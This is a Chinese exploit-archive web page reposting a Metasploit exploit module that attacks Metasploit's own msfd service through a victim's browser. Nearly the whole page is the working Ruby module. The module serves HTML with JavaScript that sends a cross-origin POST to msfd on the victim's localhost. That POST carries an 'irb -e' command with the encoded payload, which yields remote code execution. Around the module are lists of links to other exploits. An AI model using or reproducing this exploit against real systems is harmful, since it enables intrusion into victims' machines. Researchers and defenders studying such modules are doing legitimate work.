首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Metasploit Framework - 'msfd' Remote Code Execution (via Browser) (Metasploit) 来源：metasploit.com 作者：Stenvi 发布时间：2018-05-03   ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   class MetasploitModule < Msf::Exploit::Remote   Rank = NormalRanking   include Msf::Exploit::Remote::HttpServer::HTML     def initialize(info = {})     super(update_info(info,      'Name'           => 'Metasploit msfd Remote Code Execution via Browser',      'Description'    => %q{       Metasploit's msfd-service makes it possible to get a msfconsole-like       interface over a TCP socket. This module connects to the msfd-socket       through the victim's browser.         To execute msfconsole-commands in JavaScript from a web application,       this module places the payload in the POST-data. These POST-requests       can be sent cross-domain and can therefore be sent to localhost on the       victim's machine. The msfconsole-command to execute code is 'rbi -e       "CODE"'.         Exploitation when the browser is running on Windows is unreliable and       the exploit is only usable when IE is used and the quiet-flag has been       passed to msf-daemon.       },       'License'        => BSD_LICENSE,       'Author'         => 'Robin Stenvi <robin.stenvi[at]gmail.com>',       'Platform'       => 'ruby',       'Arch'           => ARCH_RUBY,       'Targets'        =>         [           [ 'Automatic', {}],         ],       'Payload'        =>         {           'Space' => 8192,  # Arbitrary limit           'DisableNops' =>  'True',           'BadChars' => "\x22\x0a"         },       'DisclosureDate' => 'Apr 11 2018',  # Vendor notification       'DefaultTarget'  => 0))         register_options([         OptString.new('REMOTE_IP', [true, 'Remote IP address when called from victim', '127.0.0.1']),         OptString.new('REMOTE_PORT', [true, 'Remote port the service is running at', '55554'])       ])   end     def exploit     super   end     def on_request_uri(cli, request)     msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"     sc = payload.encoded     shellcode = "\\x" + sc.unpack('U'*sc.length).collect {|x| x.to_s 16}.join("\\x")     var1 = rand_text_alpha(rand(6..11))     var2 = rand_text_alpha(rand(6..11))     html =  <<-EOS <html> <head></head> <body> <script> var #{var1} = new XMLHttpRequest(); #{var1}.open("POST","http://#{datastore['REMOTE_IP']}:#{datastore['REMOTE_PORT']}/", true); var #{var2} = String("#{shellcode}"); #{var1}.send("irb -e \\"" + #{var2} + "\\"\\n"); </script> </body> </html> EOS     print_status("#{msg} Sending HTML...")     send_response(cli, html, { 'Content-Type' => 'text/html' })   end end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·xdebug < 2.5.5 - Unauthenticat ·Metasploit Framework - 'msfd' ·WebKit - 'WebCore::jsElementSc ·Exim < 4.90.1 - 'base64d' Remo ·Easy MPEG to DVD Burner 1.7.11 ·Schneider Electric InduSoft We ·LibreOffice/Open Office - '.od ·Adobe Reader PDF - Client Side ·Apple macOS/iOS - ReportCrash ·GPON Routers - Authentication ·Nagios XI 5.2.6 < 5.2.9 / 5.3 ·TBK DVR4104 / DVR4216 - Creden   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved